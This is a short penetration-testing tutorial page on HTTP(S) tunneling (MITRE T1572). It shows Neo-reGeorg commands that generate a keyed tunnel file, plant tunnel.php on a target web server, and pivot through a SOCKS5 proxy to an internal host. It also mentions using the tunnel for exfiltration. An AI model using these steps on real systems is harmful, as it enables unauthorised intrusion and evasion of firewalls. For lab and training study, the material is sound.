HTTP(s) Tunneling

MITRE ATT&CK™ Protocol Tunneling - Technique T1572

Theory

HTTP tunneling is a technique that involves encapsulating non-HTTP traffic within HTTP to traverse network restrictions or security measures. It allows data to be transmitted in a way that appears as regular HTTP traffic, making it more likely to pass through firewalls and other filtering mechanisms that may be in place. Its a valuable pivoting technique to concidere.

HTTP(S) Tunneling may also be used as an exfiltration channel.

Practice

we will be using Neo-reGeorg to achieve tunneling. On our attacking machine we do:

v4resk@kali$ python3 neoreg.py generate -k 'P@ssw0rd!'

then, we have to upload generated files to the target machine and host then on a webserver. On the attacking machine we can do:

#Establish sock5 proxy
v4resk@kali$ python3 neoreg.py -k 'P@ssw0rd!' -u http://MACHINE_IP/uploader/files/tunnel.php

#We can now use it as sock5 proxy 
v4resk@kali$ curl --socks5 127.0.0.1:1080 http://172.20.0.121:80

Resources

Data ExfiltrationTryHackMe

Last updated 2 years ago

hashtagTheory

hashtagPractice

hashtagResources

Theory

Practice

Resources